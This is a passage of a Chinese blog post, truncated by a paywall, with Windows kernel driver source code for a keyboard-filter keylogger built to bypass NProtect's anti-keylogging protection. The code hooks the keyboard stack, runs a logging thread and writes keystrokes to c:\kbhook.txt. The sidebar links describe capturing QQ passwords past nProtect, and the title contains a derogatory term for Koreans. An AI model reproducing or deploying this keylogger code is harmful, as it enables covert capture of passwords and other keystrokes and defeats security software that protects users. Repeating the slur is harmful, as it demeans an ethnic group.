看棒子不顺眼,破解NProtect,键盘驱动级截取键盘记录

最新推荐文章于 2023-11-13 11:32:00 发布
最新推荐文章于 2023-11-13 11:32:00 发布
阅读量499 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43685243/article/details/86690497
版权
本文介绍如何使用驱动程序对抗NProtect的键盘钩子,通过驱动加载进入ring0级别,实现对NProtect键盘中断技术的拦截。代码示例展示了创建设备对象、钩子键盘输入、线程记录键盘动作以及处理设备控制请求的过程。
摘要由CSDN通过智能技术生成
               

NProtect,是用驱动加载进入ring0级别,每个进程注入一个钩子,

用键盘中断技术写的一个钩子,

本人就用驱动对付他,

废话少说,看代码,

 

//#include  <ntddk.h>
#include "kbhook.h"
#include "ScanCode.h"
#include   <windef.h>
int numPendingIrps=0;
//
//ICTOL 以及控制设备的相关变量
//
#define IOCTL_PASSPROCESSID /
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
UNICODE_STRING  devNameUnicd;
UNICODE_STRING  devLinkUnicd;
PDEVICE_OBJECT  pDevice;  //控制设备的设备对象
NTSTATUS  DeviceIoControlDispatch(IN  PDEVICE_OBJECT  pDeviceObject,IN  PIRP  pIrp); //DeviceIoControl的处理函数

VOID OnUnload( IN PDRIVER_OBJECT theDriverObject )
{   
 KTIMER kTimer;
 LARGE_INTEGER timeout; 
 PDEVICE_EXTENSION pKeyboradDeviceExtension;
 pKeyboradDeviceExtension=(PDEVICE_EXTENSION) theDriverObject->DeviceObject->DeviceExtension;
 IoDetachDevice(pKeyboradDeviceExtension->pKeyboardDevice);
 timeout.QuadPart=1000000;//1s
 KeInitializeTimer(&kTimer);
 while(numPendingIrps > 0)
 {
  KeSetTimer(&kTimer,timeout,NULL);
  KeWaitForSingleObject(&kTimer,Executive,KernelMode,FALSE,NULL);
  
 }
 pKeyboradDeviceExtension->bThreadTerminate=TRUE;
 KeReleaseSemaphore(&pKeyboradDeviceExtension->semQueue,0,1,TRUE);//让独立的记录线程获得执行机会
 KeWaitForSingleObject(pKeyboradDeviceExtension->pThreadObject,
  Executive,KernelMode,FALSE,NULL);             //结束独立的记录线程
 ZwClose(pKeyboradDeviceExtension->hLogFile);      //关闭文件句柄
 IoDeleteDevice(theDriverObject->DeviceObject);    //删除设备对象
 
 IoDeleteSymbolicLink(&devLinkUnicd);
 IoDeleteDevice(pDevice);
 DbgPrint("My Driver Unloaded!");
 return;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,IN PUNICODE_STRING RegistryPath)
{
 

 NTSTATUS status={0};
 int i;
 PDEVICE_EXTENSION pKeyboardDeviceExtension;
 
 IO_STATUS_BLOCK file_status;
 OBJECT_ATTRIBUTES obj_attrib;
 CCHAR ntNameFile[100]="//DosDevices//c://kbhook.txt";
 STRING ntNameString;
 UNICODE_STRING uFileName;
 
 for( i=0 ; i < IRP_MJ_MAXIMUM_FUNCTION;i++)
  
  theDriverObject->MajorFunction[i] = DispatchPassDown;
 theDriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
 
 HookKeyboard(theDriverObject);
 //建立一个线程用来记录键盘动作
 InitThreadKeyLogger(theDriverObject);
 
 /
 初始化一个旋转锁来访问链表///
 pKeyboardDeviceExtension=(PDEVICE_EXTENSION)theDriverObject->DeviceObject->DeviceExtension;
 InitializeListHead(&pKeyboardDeviceExtension->QueueListHead);

 KeInitializeSpinLock(&pKeyboardDeviceExtension->lockQueue);
 KeInitializeSemaphore(&pKeyboardDeviceExtension->semQueue,0,MAXLONG);
 创建一个纪录文件///
 RtlInitAnsiString(&ntNameString,ntNameFile);
 RtlAn

最低0.47元/天 解锁文章
月亮这么低
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
驱动入门系列---驱动键盘记录器(二)
zhihu008的专栏
03-12 1997
驱动入门系列---驱动键盘记录器(二)   走过了VC++到驱动开发,回头看,才发现真是迂回曲折。今天,应一个朋友之邀,结合一个完整的例子,写一点驱动入门的东西,希望对初学者能有所帮助。为了更深入的学习驱动开发,我将用DDK 和Compuware DriverStudio V3.2两种方法来构建这个例子。 我也只是入门,理解也未必正确,有错误的地方望多多指教。有问题欢迎与我联系。
驱动键盘记录器展示
07-24
展示一款驱动键盘记录器(能过QQ密码框)执行程序,不隐藏,捕获的按键直接显示,仅软件作为学习研究用,不得用于非法目的,非法使用,一切后果自负
驱动键盘记录器与安全密码框(能获取QQ密码)
dylan的专栏
07-04 1848
<br />http://blog.csdn.net/jinhill/archive/2010/06/12/5667212.aspx
简单过QQ的nProtect键盘驱动加密
08-28 1037
 谁都知道nProtect驱动层的键盘加密保护,但是这个nProtect也不是时刻接管着我们的键盘,仅仅在用户输入密码的时候才真正启动,而程序是如何获知用户开始输入密码了呢?用简单的windows编程方法就能想到,就是处理WM_SETFOCUS消息,一旦某控件获得焦点windows就会发送WM_SETFOCUS到那个hwnd,而一旦那个控件失去焦点的时候,nProtect需要关闭,否则就影响
nProtect-GameGuard:nProtect GameGuard
02-20
GameGuard的核心在于其独特的驱动防护机制,它通过动态加载驱动程序来监控游戏环境,确保游戏过程的公平性和稳定性。 在C语言的基础上,nProtect GameGuard构建了一套严密的防护体系。C语言作为底层编程语言,...
突破QQ2009的nprotect键盘加密技术
elephantzhang的专栏
07-30 3203
近段时间,腾迅公司一直在吹牛他们如何保护QQ用户的帐号和密码安全,Nprotect键盘加密技术多么强大,由于鄙人近期要做一个密码安全保护控件,就仔细分析了QQ2009的密码保护功能框,结果发现QQ2009漏洞较多,安全措施都能获得突破,下面一一道来:鄙人声名:分析QQ2009的目的,不是盗取QQ帐号,而是提高QQ的安全,促进QQ的发展。信息安全需要很多事情要做,本人只是贡献点微薄之力。信息安全
一个著名防外挂软件,下面转载一遍关于nProtect破解
风信子的专栏
04-10 9660
新版本增加一个nProtect GameGuard著名防外挂软件,下面转载一遍关于nProtect破解!nProtect GameGuard 是一款比较著名的防作弊软件,在玩家使用外挂(无论任何游戏的外挂,就算不是当前游戏的外挂也不可以)的时候会提示"检测到游戏被破解修改"并强行关闭游戏。什么是nProtect?nProtect是设计用于保护个人电脑终端不被病毒和黑客程序感染的新概念的基于网络的
nProtect.e源碼
09-23
nprotect的易語言源碼.可以編程np程序
深入分析与破解QQ键盘加密保护 ——反nProtect技术
jinhanzhi的专栏
03-06 1277
深入分析与破解QQ键盘加密保护——反nProtect技术武汉大学计算机学院信息安全0411班 禤彪/文 摘要:本文对QQ的nProtect密码安全输入控件保护技术进行了分析,并针对其破解思路进行了描述和实现,本文还给出了关键代码分析。实验表明,本文给出的方法可以有效地截获nProtect密码安全输入控件中的密码。本文最后还给出了相关的防护思路和措施。关键字:nProtect
nProtect GameGuard(簡稱GameGuard或GG,其驅動程序為GameMon.des)是由韓國INCA互聯網開發的遊戲反作弊軟體。
最新发布
weixin_40191861的博客
11-13 1079
nProtect GameGuard nProtect GameGuard(簡稱GameGuard或GG,其驅動程序為GameMon.des)是由韓國INCA互聯網開發的遊戲反作弊軟體。隨著網絡遊戲的興起,愈來愈多人利用外掛從中作弊,這促使GameGuard等反作弊軟體的誕生。GameGuard開發完成後,很快就被日本及韓國網絡遊戲商引入。隨後開設「網絡遊戲用戶通報中心」,傳送不正當或作弊之訊息。 nProtect GameGuard 預設的nProtect GameGuard起始圖片
突破NP屏蔽,实现按键模拟!
热门推荐
fengfengfengmy的专栏
05-09 1万+
突破NP屏蔽,实现按键模拟! nProtect GameGuard、XTRAP是两款比较著名的防作弊软件,在玩家使用外挂(无论任何游戏的外挂,就算不是当前游戏的外挂也不可以)的时候 会提示"检测到游戏被破解修改"并强行关闭游戏。 什么是nProtect? nProtect是设计用于保护个人电脑终端不被病毒和黑客程序感染的新概念的基于网络的反黑客和反病毒的工具。他帮助确保所有输入个人电脑 终端的信息
nProtect的一些知识
weixin_30492047的博客
09-08 669
  nProtect GameGuard 是一款比较著名的防作弊软件,在玩家使用外挂的时候会提示"检测到游戏被破解修改"并强行关闭游戏。   什么是nProtect?   nProtect是设计用于保护个人电脑终端不被病毒和黑客程序感染的新概念的基于网络的反黑客和反病毒的工具。他帮助确保所有输入个人电脑终端的信息在网络上不落入黑客手中。在最终用户在执行电子贸易时,可以通过将nProtect...
简单过QQ的nProtect键盘加密保护
10-14 1397
谁都知道nProtect驱动层的键盘加密保护,但是这个nProtect也不是时刻接管着我们的键盘,仅仅在用户输入密码的时候才真正启动,而程序是如何获知用户开始输入密码了呢?用简单的windows编程方法就能想到,就是处理WM_SETFOCUS消息,一旦某控件获得焦点windows就会发送WM_SETFOCUS到那个hwnd,而一旦那个控件失去焦点的时候,nProtect需要关闭,否则就影响到用户
反NP监视原理(+Bypass NP in ring0
04-26 1935
标 题: 【原创】反NP监视原理(+Bypass NP in ring0)作 者: 堕落天才时 间: 2007-01-03,11:58链 接: http://bbs.pediy.com/showthread.php?t=37353NP=nProtect GameGuard(如果你不知道这是什么,请不要往下看)********************************************标
反NP监视原理
VxD
03-12 1464
NP=nProtect GameGuard(如果你不知道这是什么,请不要往下看)********************************************标题:【原创】反NP监视原理                   **作者:堕落天才                               **日期:2007年1月3号                           **
在NP下用OD调试游戏的方法
Fido
02-03 2671
首先附上国内对NP的研究,看到我这里你也不用到别处找了,因为国内就这几篇了. 文章1:反NP监视原理 作者:堕落天才 一、NP用户层监视原理 NP启动后通过WriteProcessMemory跟CreateRemoteThread向所有进程注入代码(除了系统进程smss.exe),代码通过np自己的LoadLibrary向目标进程加载npggNT.des。npggNT.des一旦加载就马上开始干“
虚拟机永久过np tp vmp se gk g盾 镜像
10-31
np通常是指“Nprotect”,它是一种用于防止恶意程序(如病毒、木马等)侵入系统的技术。 tp可能是指“Transparent Page Sharing”,它是一种虚拟机内存管理技术,可以将多个虚拟机中相同的内存页合并,从而节省内存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值